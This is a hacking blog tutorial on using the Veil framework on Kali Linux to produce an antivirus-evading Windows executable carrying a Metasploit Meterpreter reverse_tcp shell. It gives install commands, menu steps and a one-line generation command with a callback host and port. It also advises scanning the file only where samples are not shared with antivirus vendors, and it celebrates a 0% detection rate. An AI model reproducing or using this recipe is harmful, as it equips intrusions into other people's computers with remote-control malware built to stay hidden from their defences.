How to Hack: Bypassing Antivirus using Veil on Kali Linux

Share:Share on FacebookShare on Google+Tweet about this on TwitterShare on RedditPin on PinterestShare on StumbleUponEmail this to someoneDigg thisShare on LinkedInShare on Tumblr

imagesVeil is an awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali Linux with the goal of:

  • Bypass common AV solutions used.
  • Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
  • Try to create each payload as random as possible.

I want to talk about Veil and give some examples about how to bypass several anti-virus.

The main changes in the latest versions are:

  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

If you want to install Veil in your whatever environment you prefer, you can use the commands below:

wget https://github.com/ChrisTruncer/Veil/archive/master.zip

unzip master.zip

cd Veil-master/setup

cd ..

./setup.sh

If you want to work with Kali Linux, with the commands below it will be enough.

apt-get update

apt-get install veil 

I had a  bad experience with the second option and I prefer to install Veil with the first one using “setup.sh” script.

The Veil’s developers don’t want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There is an alternative: vscan.novirusthanks.org. That site scans the suspicious files for malware detection and offers us the option: “Do not distribute the sample”.

When Veil has been installed, just run it with the command below:

./Veil

By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type “use”.

Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing “18

When our payload is loaded, type “generate“. You can set some specifics options, but in this post, we are going to try the default options.

Now we are going to select msfvenom by typing “1

After that, we need to type some details:

  • Enter metasploit payload: “windows/meterpreter/reverse_tcp
  • Enter value for ‘LHOST’, [tab] for local IP: “192.168.69.69”
  • Enter value for ‘LPORT': “443

Then it’s necessary to wait while the shellcode is been generated.

You need to press enter and then Veil requests the name of our payload. In this case “undetectable” (or whatever you want)

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1

In the end, we can get our executable at “/root/Veil-master/output/compiled/

Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check “Do not distribute the sample“. If you choose to don’t check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.

You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!

If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.

./Veil.py -l python -p b64VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69 LPORT=443


Share:Share on FacebookShare on Google+Tweet about this on TwitterShare on RedditPin on PinterestShare on StumbleUponEmail this to someoneDigg thisShare on LinkedInShare on Tumblr
Tagged , , , , , , , , , , , , , . Bookmark the permalink.

One Response to How to Hack: Bypassing Antivirus using Veil on Kali Linux

  1. Storm says:

    how can you use this payload with an exploit inside an metasploit frame work

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>